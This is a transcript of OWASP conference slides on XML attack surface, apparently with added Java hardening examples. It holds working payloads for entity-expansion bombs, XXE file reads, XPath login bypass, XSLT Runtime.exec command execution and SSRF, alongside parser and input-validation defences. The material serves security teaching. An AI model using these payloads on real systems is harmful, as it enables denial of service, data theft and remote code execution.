XML Attack Surface - Pierre Ernst (OWASP Ottawa)

Jan 15, 2015

OWASP Ottawa

XML processing security vulnerabilities and how to avoid them.
Transcript
Page 1: XML Attack Surface - Pierre Ernst (OWASP Ottawa)

OWASP

Pierre Ernst, 2013

XML Attack Surface

Business Analytics Security Competency Group

Page 2: XML is Pervasive

Page 3: XML intro

■ Born in 1998 (see initial specifications)
■ Data interchange format
  – International language support
  – Text based
  – Human readable
■ Parsers
  – DOM
  – SAX, rooted in Ottawa (see bio)
  – StAX
■ Complementary technologies and standards
  – XML Validation (DTD, XSD, ...)
  – XML Transformation (XSLT)
  – XML Query (XQuery, XPath)

Page 4: Is XML Secure?

■ Nothing wrong with the standard itself
■ Most vulnerabilities are due to
  – Libraries/tools misconfiguration
  – Insufficient validation of untrusted input
■ Known, reported security vulnerabilities (see CVE search)

Page 5: XML Bomb

■ CWE-776 (XML entity expansion): denial of service by memory exhaustion
■ Amit Klein, 2002 (see BugTraq)
■ XML entity expansion: each entity references the next one twice, so the single &ernst000; reference below expands to 2^128 copies of "pierre"

<!DOCTYPE ibm [
  <!ENTITY ernst128 "pierre">
  <!ENTITY ernst127 "&ernst128;&ernst128;">
  ...
  <!ENTITY ernst002 "&ernst003;&ernst003;">
  <!ENTITY ernst001 "&ernst002;&ernst002;">
  <!ENTITY ernst000 "&ernst001;&ernst001;">
]>
<ibm>&ernst000;</ibm>

Page 6: Modus Operandi

1. Attacker -> Vulnerable Server: POST /request HTTP/1.1 with the body <ibm>&ernst000;</ibm>
2. The server's parser expands the references level by level: <ibm>&ernst001;&ernst001;</ibm>, then <ibm>&ernst002;&ernst002;&ernst002;&ernst002;</ibm>, then <ibm>&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;</ibm>, and so on, doubling at each level until memory is exhausted.

Page 7: Demo #1: Server Crash with XML Bomb

(Source code available on demand)

Page 8: Variation: "Quadratic Blowup Attack"

■ Amit Klein (see MSDN article)
■ Uses one single entity of size 50 KB
■ References the entity 50,000 times (about 2.5 GB once expanded)
■ Useful to bypass the FEATURE_SECURE_PROCESSING protection, which only limits the number of entity expansions:
  • 100,000 (IBM)
  • 64,000 (Oracle)

<!DOCTYPE pierre [
  <!ENTITY e "eeeeeeeeeeee...eeeeeeeee">
]>
<pierre>&e;&e;&e;...&e;&e;&e;</pierre>
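The difference between the two payload shapes on pages 5 and 8 is easiest to see by counting expansions and expanded characters without actually expanding anything. The following is an added example, not code from the talk: a small static estimator that reads the internal DTD subset of a document with a regular expression, walks the entity reference graph with memoisation, and reports how many expansions a parser would perform and how large the result would be. The class name, the generator methods and the payload sizes used in main are this example's own choices; the payload shapes follow the slides.

```java
import java.util.ArrayDeque;
import java.util.Deque;
import java.util.HashMap;
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/** Added example: estimates what an internal-DTD payload would expand to, without expanding it. */
public class EntityExpansionEstimator {

    // Internal general entities with a double-quoted literal value. SYSTEM/PUBLIC entities are a
    // different problem (XXE, SSRF) and are deliberately not modelled here.
    private static final Pattern ENTITY_DECL = Pattern.compile("<!ENTITY\\s+(\\w+)\\s+\"([^\"]*)\"\\s*>");
    private static final Pattern ENTITY_REF = Pattern.compile("&(\\w+);");

    /** Number of entity expansions a parser would perform, and the size of the expanded text. */
    public static final class Cost {
        public final long expansions;
        public final long expandedChars;
        Cost(long expansions, long expandedChars) { this.expansions = expansions; this.expandedChars = expandedChars; }
        @Override public String toString() { return expansions + " expansions, " + expandedChars + " chars"; }
    }

    public static Map<String, String> declaredEntities(String xml) {
        Map<String, String> ents = new LinkedHashMap<>();
        Matcher m = ENTITY_DECL.matcher(xml);
        while (m.find()) ents.put(m.group(1), m.group(2));
        return ents;
    }

    // Memoised per entity, so a 128-level bomb is analysed in 128 steps rather than 2^128.
    private static Cost costOf(String text, Map<String, String> ents, Map<String, Cost> memo, Deque<String> stack) {
        long expansions = 0, chars = 0;
        int last = 0;
        Matcher m = ENTITY_REF.matcher(text);
        while (m.find()) {
            chars += m.start() - last;
            last = m.end();
            String name = m.group(1);
            String value = ents.get(name);
            if (value == null) {            // &lt;, &amp; or undeclared: treated as literal text
                chars += m.group().length();
                continue;
            }
            if (stack.contains(name)) throw new IllegalStateException("recursive entity: " + name);
            Cost c = memo.get(name);
            if (c == null) {
                stack.push(name);
                c = costOf(value, ents, memo, stack);
                stack.pop();
                memo.put(name, c);
            }
            expansions += 1 + c.expansions;   // this reference plus everything nested under it
            chars += c.expandedChars;
        }
        chars += text.length() - last;
        return new Cost(expansions, chars);
    }

    /** Cost of the document content after the internal subset ("]>"), or of the whole text if none. */
    public static Cost estimate(String xml) {
        int end = xml.indexOf("]>");
        String body = end < 0 ? xml : xml.substring(end + 2);
        return costOf(body, declaredEntities(xml), new HashMap<>(), new ArrayDeque<>());
    }

    /** Page 5 shape: ernst000 -> 2 x ernst001 -> ... -> ernst<depth> = "pierre". */
    public static String billionLaughs(int depth) {
        StringBuilder sb = new StringBuilder("<!DOCTYPE ibm [");
        sb.append(String.format("<!ENTITY ernst%03d \"pierre\">", depth));
        for (int i = depth - 1; i >= 0; i--)
            sb.append(String.format("<!ENTITY ernst%03d \"&ernst%03d;&ernst%03d;\">", i, i + 1, i + 1));
        return sb.append("]><ibm>&ernst000;</ibm>").toString();
    }

    /** Page 8 shape: one entity of entityChars characters, referenced refs times. */
    public static String quadraticBlowup(int entityChars, int refs) {
        StringBuilder sb = new StringBuilder("<!DOCTYPE pierre [<!ENTITY e \"");
        for (int i = 0; i < entityChars; i++) sb.append('e');
        sb.append("\">]><pierre>");
        for (int i = 0; i < refs; i++) sb.append("&e;");
        return sb.append("</pierre>").toString();
    }

    public static void main(String[] args) {
        // 30 levels instead of the slide's 128: the expansion count of 128 levels (2^129 - 1)
        // does not even fit in a long.
        System.out.println("billion laughs, 30 levels : " + estimate(billionLaughs(30)));
        System.out.println("quadratic, 50 KB x 50,000 : " + estimate(quadraticBlowup(50_000, 50_000)));
    }
}
```

The arithmetic is the point: a 30-level bomb costs 2^31 - 1 expansions, so a counter capped at 64,000 or 100,000 stops it early, while the quadratic payload needs exactly 50,000 expansions (under both caps) to produce 2.5 x 10^9 characters. This is why the conclusions slide says the secure processing flag is not enough on its own. Later JDKs added a separate total-entity-size limit (jdk.xml.totalEntitySizeLimit); refusing the DOCTYPE altogether, as the next slide does, needs no such tuning.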

Page 9: Protection

DOM, SAX:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

StAX:
factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);

Page 10: External Entity Reference (XXE)

■ CWE-611 (improper restriction of XML external entity reference): information disclosure
■ Gregory Steuck, 2002 (see BugTraq)
■ Requires the server to include user-supplied data in the response

<!DOCTYPE pierre [
  <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
]>
<pierre>&ernst;</pierre>

Page 11: Modus Operandi

1. Attacker -> Vulnerable Server: POST /request HTTP/1.1 with the body <pierre>&ernst;</pierre>
2. The server's parser resolves the external entity: <pierre>[... content of the file on the server...]</pierre>
3. Vulnerable Server -> Attacker:

HTTP/1.1 200 OK
Content-Type: text/xml

<response>Unknown service [... content of the file on the server...]</response>

Page 12: Demo #2: File Content Disclosure with XXE

(Source code available on demand)

Page 13: Protection

DOM, SAX:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

StAX:
factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);

Page 14: Blind XPath Injection ("XML Injection")

■ CWE-643 (improper neutralization of data within XPath expressions): abuse of functionality
■ Amit Klein, 2004 (see white-paper)
■ User input is embedded as-is in the XPath statement

<users>
  <user>
    <name>pierre</name>
    <password>i8simon</password>
  </user>
  <user>
    <name>trevor</name>
    <password>mee2</password>
  </user>
</users>

Legitimate login (name "pierre", password "i8simon"):
//users/user[name/text()='pierre' and password/text()='i8simon']/name/text()

Injected login (name and password both set to ' or ''='):
//users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()

Page 15: Modus Operandi

1. Attacker -> Vulnerable Server: POST /login HTTP/1.1 with name and password both set to ' or ''='
2. The server evaluates //users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text(), whose predicate is true for every user
3. Vulnerable Server -> Attacker:

HTTP/1.1 200 OK
Content-Type: text/html

pierre trevor

Page 16: Demo #3: Blind XPath Injection

(Source code available on demand)

Page 17: Variation: Read System Properties

■ Applies to the JAXP implementations:
  – IBM
  – Oracle
■ Interesting properties:
  – os.version
  – user.name
  – java.class.path
  – sun.java.command
■ Injected into the XPath expression, the XSLT system-property() function reads the JVM's system properties:

system-property('sun.java.command')

Page 18: Protection

■ Input validation.
■ "[A-Za-z0-9_\-]+" in our example.
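The login query of pages 14 and 15 and the allow-list of page 18, worked through in JAXP as an added example (this is not code from the talk; the demo source was only available on demand). The users document is the one on page 14, embedded inline so the example runs offline. Besides the allow-list, the example also binds the inputs as XPath variables through an XPathVariableResolver, which keeps them data even when the allow-list has to be wider than alphanumerics; that second layer and the method names are this example's choices, not the speaker's.

```java
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpression;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;

/** Added example: the page-14 login query, spliced together (vulnerable), then validated and parameterised. */
public class XPathLogin {

    // The users document from page 14.
    static final String USERS =
        "<users><user><name>pierre</name><password>i8simon</password></user>"
      + "<user><name>trevor</name><password>mee2</password></user></users>";

    // The allow-list from page 18.
    static final Pattern SAFE = Pattern.compile("[A-Za-z0-9_\\-]+");

    static Document loadUsers() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        return f.newDocumentBuilder().parse(new InputSource(new StringReader(USERS)));
    }

    static List<String> textValues(NodeList nodes) {
        List<String> out = new ArrayList<>();
        for (int i = 0; i < nodes.getLength(); i++) out.add(nodes.item(i).getNodeValue());
        return out;
    }

    /** Vulnerable: the request parameters become part of the XPath syntax. */
    static List<String> loginVulnerable(Document users, String name, String password) throws Exception {
        String expr = "//users/user[name/text()='" + name + "' and password/text()='" + password + "']/name/text()";
        XPath xp = XPathFactory.newInstance().newXPath();
        return textValues((NodeList) xp.evaluate(expr, users, XPathConstants.NODESET));
    }

    /** Parameterised: the expression is fixed; $name and $password are supplied as values. */
    static List<String> loginParameterized(Document users, String name, String password) throws Exception {
        XPath xp = XPathFactory.newInstance().newXPath();
        xp.setXPathVariableResolver(var -> {
            switch (var.getLocalPart()) {
                case "name": return name;
                case "password": return password;
                default: return null;
            }
        });
        XPathExpression expr = xp.compile("//users/user[name/text()=$name and password/text()=$password]/name/text()");
        return textValues((NodeList) expr.evaluate(users, XPathConstants.NODESET));
    }

    /** Hardened: the page-18 allow-list in front of the parameterised query. */
    static List<String> loginSafe(Document users, String name, String password) throws Exception {
        if (!SAFE.matcher(name).matches() || !SAFE.matcher(password).matches())
            throw new IllegalArgumentException("rejected by input validation");
        return loginParameterized(users, name, password);
    }

    public static void main(String[] args) throws Exception {
        Document users = loadUsers();
        String injection = "' or ''='";
        System.out.println("valid login, vulnerable  : " + loginVulnerable(users, "pierre", "i8simon"));
        System.out.println("injection, vulnerable    : " + loginVulnerable(users, injection, injection));
        System.out.println("injection, parameterised : " + loginParameterized(users, injection, injection));
        try {
            loginSafe(users, injection, injection);
        } catch (IllegalArgumentException e) {
            System.out.println("injection, validated     : " + e.getMessage());
        }
    }
}
```

With the spliced query the injected predicate is `'' or ''='' and '' or ''=''`, which is true for every user, so both names come back, exactly as page 15 shows. With the variable-bound query the same string is compared literally against the name and password elements and matches nothing; the allow-list rejects it before the query is even built.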

Page 19: Code Injection during XSLT

■ CWE-94: Improper Control of Generation of Code
■ When the attacker can control the XML stylesheet applied to an XML document
■ Uses the transformer engine's extension capabilities (here Xalan's Java extension namespace)

<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="xalan://java.lang.Runtime"
    exclude-result-prefixes="rt">
  <xsl:template match="/">
    <xsl:variable name="obj" select="rt:getRuntime()"/>
    <xsl:value-of select="rt:exec($obj,'calc.exe')"/>
  </xsl:template>
</xsl:stylesheet>

Page 20: Modus Operandi

1. Attacker -> Vulnerable Server: GET /request?doc=...&stylesheet=... HTTP/1.1, supplying <doc>whatever</doc> and <stylesheet>malicious</stylesheet>
2. The transformer loads the class java.lang.Runtime
3. ... and calls its exec() method

Page 21: Demo #4: Remote OS Command Injection

(Source code available on demand)

Page 22: Variation #1: Universal XXE

<!DOCTYPE xsl:stylesheet [
  <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    &ernst;
  </xsl:template>
</xsl:stylesheet>

● "Universal": you always see the entity in the response. Unlike page 10, the application does not need to echo the input back, because the entity's content becomes the output of the transformation itself.

Page 23: Variation #2: Infinite Loop

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template name="loop">
    <xsl:call-template name="loop"/>
  </xsl:template>
  <xsl:template match="/">
    <xsl:call-template name="loop"/>
  </xsl:template>
</xsl:stylesheet>

1. The root template calls the named template "loop"
2. "loop" calls itself with no termination condition, so the transformation never finishes

Page 24: Variation #3: Cross-Site Scripting (XSS)

<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <xsl:output method="html"/>
  <xsl:template match="/">
    <xhtml:script>alert('XSS');</xhtml:script>
  </xsl:template>
</xsl:stylesheet>

Page 25: Protection

■ Several ways to abuse XML Stylesheet Transforms.
■ Users should never be able to supply custom XML stylesheets.
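What "users never supply the stylesheet" looks like in JAXP, as an added example (not code from the talk): the request only names a stylesheet, the server resolves that name against its own allow-list, the input document is parsed with DOCTYPE refused (which closes the universal-XXE variation of page 22), and the TransformerFactory runs with secure processing and no external access. The stylesheet map, its single "greeting" entry and the class name are constructed for this example; the ACCESS_EXTERNAL_* attributes exist from JAXP 1.5 onwards, so the example tolerates older implementations that do not know them.

```java
import java.io.StringReader;
import java.io.StringWriter;
import java.util.LinkedHashMap;
import java.util.Map;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.dom.DOMSource;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

/** Added example: server-owned stylesheets only, on a hardened TransformerFactory. */
public class ServerSideXslt {

    // Constructed allow-list of stylesheets the server ships; a request may pick one by name
    // but never supply stylesheet text or a path.
    static final Map<String, String> STYLESHEETS = new LinkedHashMap<>();
    static {
        STYLESHEETS.put("greeting",
            "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">"
          + "<xsl:output method=\"text\"/>"
          + "<xsl:template match=\"/\">Hello, <xsl:value-of select=\"/doc\"/></xsl:template>"
          + "</xsl:stylesheet>");
    }

    static TransformerFactory hardenedFactory() throws Exception {
        TransformerFactory tf = TransformerFactory.newInstance();
        // Secure processing turns off extension functions and elements (the xalan://java.lang.Runtime
        // trick of page 19) in the JDK's XSLTC processor.
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        try {
            // JAXP 1.5: no fetching of external DTDs, nor of xsl:import/xsl:include/document() targets.
            tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        } catch (IllegalArgumentException unsupportedByOlderImplementation) {
            // Pre-JAXP 1.5 processor: the attributes are unknown; secure processing still applies.
        }
        return tf;
    }

    static String transform(String stylesheetName, String inputXml) throws Exception {
        String xsl = STYLESHEETS.get(stylesheetName);
        if (xsl == null) throw new IllegalArgumentException("unknown stylesheet: " + stylesheetName);

        // The request document is parsed with DOCTYPE refused, so a DOCTYPE in the input
        // never reaches the transformer.
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setXIncludeAware(false);
        Document doc = dbf.newDocumentBuilder().parse(new InputSource(new StringReader(inputXml)));

        Transformer t = hardenedFactory().newTransformer(new StreamSource(new StringReader(xsl)));
        StringWriter out = new StringWriter();
        t.transform(new DOMSource(doc), new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        System.out.println(transform("greeting", "<doc>whatever</doc>"));

        try {
            transform("../../tmp/evil.xsl", "<doc/>");
        } catch (IllegalArgumentException e) {
            System.out.println(e.getMessage());
        }

        // Page 19's stylesheet, fed straight to the hardened factory to show the second line of
        // defence: with secure processing on, the extension call is refused (at compile or
        // transform time, depending on the processor) instead of running calc.exe.
        String malicious =
            "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
          + " xmlns:rt=\"xalan://java.lang.Runtime\"><xsl:template match=\"/\">"
          + "<xsl:value-of select=\"rt:exec(rt:getRuntime(),'calc.exe')\"/></xsl:template></xsl:stylesheet>";
        try {
            Transformer t = hardenedFactory().newTransformer(new StreamSource(new StringReader(malicious)));
            t.transform(new StreamSource(new StringReader("<doc/>")), new StreamResult(new StringWriter()));
            System.out.println("extension call was NOT blocked");
        } catch (Exception e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allow-list is the control the slide asks for; the hardened factory is defence in depth for the day someone wires a request parameter into newTransformer anyway. Note that secure processing does nothing against the infinite-loop stylesheet of page 23 or the XSS one of page 24, which is why the primary control has to be "no user-supplied stylesheets" rather than any factory setting.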

Page 26: Server Side Request Forgery (SSRF)

■ CWE-601: Open Redirect, but server-to-server (CWE-918 now covers SSRF directly)
■ Nathan Hamiel, Shawn Moyer, 2009 (ShmooCon)
■ XML vectors:
  – XML eXternal Entities (XXE)
  – XInclude
  – External DOCTYPE inclusion:

<!DOCTYPE PIERRE PUBLIC "ernst" "http://intranet:666/start-armageddon">
<pierre/>

Page 27: Modus Operandi

1. Attacker -> Vulnerable Server:

POST /request HTTP/1.1
Content-Type: application/xml
Content-Length: 666

<?xml version="1.0"?>...

2. Vulnerable Server -> Internal Service: while parsing, the server fetches the URL named in the DOCTYPE (or entity), sending whatever request the attacker chose to the internal service

Page 28: Protection

DOM, SAX:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

StAX:
factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
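The one-line settings on the Protection pages 9, 13 and 28 are the same control each time: refuse the DOCTYPE. Below, as an added example (not code from the talk), the three JAXP parser families are configured that way and exercised against the payload shapes of this talk, so you can see each one rejected at the DOCTYPE before any entity, file or URL is touched. The payloads are constructed after the slides (the bomb shortened to three levels, since only the DOCTYPE has to be present for the rejection to trigger); the class and method names are this example's own.

```java
import java.io.StringReader;
import java.util.LinkedHashMap;
import java.util.Map;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamConstants;
import javax.xml.stream.XMLStreamReader;
import org.xml.sax.InputSource;
import org.xml.sax.helpers.DefaultHandler;

/** Added example: DOM, SAX and StAX factories that refuse a DOCTYPE, run against the talk's payloads. */
public class NoDoctypeParsers {

    // Constructed payloads following pages 5, 10 and 26, plus a benign control document.
    static final Map<String, String> PAYLOADS = new LinkedHashMap<>();
    static {
        PAYLOADS.put("xml bomb",
            "<!DOCTYPE ibm [<!ENTITY ernst002 \"pierre\">"
          + "<!ENTITY ernst001 \"&ernst002;&ernst002;\">"
          + "<!ENTITY ernst000 \"&ernst001;&ernst001;\">]><ibm>&ernst000;</ibm>");
        PAYLOADS.put("xxe",
            "<!DOCTYPE pierre [<!ENTITY ernst SYSTEM \"file:///c:/windows/win.ini\">]>"
          + "<pierre>&ernst;</pierre>");
        PAYLOADS.put("ssrf via external doctype",
            "<!DOCTYPE PIERRE PUBLIC \"ernst\" \"http://intranet:666/start-armageddon\"><pierre/>");
        PAYLOADS.put("benign", "<pierre>hello</pierre>");
    }

    static DocumentBuilderFactory domFactory() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setXIncludeAware(false);          // XInclude is the other SSRF vector on page 26
        f.setExpandEntityReferences(false); // belt and braces; moot once the DOCTYPE is refused
        return f;
    }

    static SAXParserFactory saxFactory() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setXIncludeAware(false);
        return f;
    }

    static XMLInputFactory staxFactory() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);                     // page 28
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        f.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);  // pages 9 and 13
        return f;
    }

    /** Returns "accepted" or "rejected: <reason>". */
    static String tryDom(String xml) {
        try {
            domFactory().newDocumentBuilder().parse(new InputSource(new StringReader(xml)));
            return "accepted";
        } catch (Exception e) { return "rejected: " + e.getMessage(); }
    }

    static String trySax(String xml) {
        try {
            saxFactory().newSAXParser().parse(new InputSource(new StringReader(xml)), new DefaultHandler());
            return "accepted";
        } catch (Exception e) { return "rejected: " + e.getMessage(); }
    }

    // StAX implementations differ: with SUPPORT_DTD off, some throw on a DOCTYPE while others merely
    // report a DTD event and move on, so the application refuses that event itself.
    static String tryStax(String xml) {
        try {
            XMLStreamReader r = staxFactory().createXMLStreamReader(new StringReader(xml));
            while (r.hasNext()) {
                int event = r.next();
                if (event == XMLStreamConstants.DTD) return "rejected: DOCTYPE present";
                if (event == XMLStreamConstants.ENTITY_REFERENCE)
                    return "rejected: unexpanded entity reference " + r.getLocalName();
            }
            return "accepted";
        } catch (Exception e) { return "rejected: " + e.getMessage(); }
    }

    public static void main(String[] args) {
        for (Map.Entry<String, String> p : PAYLOADS.entrySet()) {
            System.out.println(p.getKey());
            System.out.println("  DOM : " + tryDom(p.getValue()));
            System.out.println("  SAX : " + trySax(p.getValue()));
            System.out.println("  StAX: " + tryStax(p.getValue()));
        }
    }
}
```

Only the benign document should come back "accepted" from all three. On the StAX side, IS_REPLACING_ENTITY_REFERENCES=false (pages 9 and 13) only stops the reader from expanding references in content; the DOCTYPE itself is still read, so the external-DOCTYPE fetch of page 26 can still happen. SUPPORT_DTD=false (page 28) is the stronger setting, and the explicit check for the DTD event makes the policy independent of which StAX implementation is on the classpath.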

Page 29: Variation: Exotic Java URL Handlers

■ Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin, 2012 (CVE-2012-5085)

Page 30: Conclusions

■ Always configure your XML parsers to disallow DOCTYPE.
  – From a server's perspective, clients should not be able to define the grammar of the request anyway
  – The secure processing flag is not enough
  – Preventing external entity expansion is not enough
■ XPath: validate the user's input
■ XSLT: avoid at any cost
■ Always apply Java patches from vendors

Page 31: Pierre Ernst

■ 10 years as Software Developer
■ 5 years as Penetration Tester
  – 750+ vulns
  – Manual Code Review
  – Manual Black Box Testing
  – Java, XML, Open Source, …

https://twitter.com/e_rnst
http://ca.linkedin.com/in/pernst
[email protected]

Page 32: Questions & Answers